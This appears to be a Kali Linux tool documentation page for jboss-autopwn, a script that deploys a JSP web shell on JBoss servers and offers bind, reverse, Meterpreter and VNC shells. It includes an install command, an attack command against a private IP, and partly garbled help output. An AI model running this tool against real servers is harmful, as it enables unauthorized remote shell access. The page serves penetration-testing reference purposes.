jboss-autopwn Usage Example
Attack the target server (
192.168.1.200) on the specified port (
8080), redirecting stderr (
[email protected]:~# jboss-linux 192.168.1.200 8080 2> /dev/null [x] Retrieving cookie [x] Now creating BSH script... [!] Cound not create BSH script.. [x] Now deploying .war file:
Packages and Binaries:
This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
Features include: - Multiplatform support - tested on Windows, Linux and Mac targets - Support for bind and reverse bind shells - Meterpreter shells and VNC support for Windows targets
How to install:
sudo apt install jboss-autopwn
[email protected]:~# jboss-linux -h [x] Retrieving cookie [x] Now creating BSH script... [!] Cound not create BSH script.. [x] Now deploying .war file: [x] Something went wrong...
[email protected]:~# jboss-win -h [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created successfully on c: [x] Now deploying .war file: [x] Web shell enabled!: http://-h:/browserwin/browser/Browser.jsp [x] Server name...: Usage: ncat [options] [hostname] [port] -n, --nodns Do not resolve hostnames via DNS --allow Allow only given hosts to connect to Ncat --allowfile A file of hosts allowed to connect to Ncat --deny Deny given hosts from connecting to Ncat --denyfile A file of hosts denied from connecting to Ncat --proxy <addr[:port]> Specify address of host to proxy through [x] Would you like a reverse or bind shell or vnc(bind)?
Updated on: 2022-Aug-05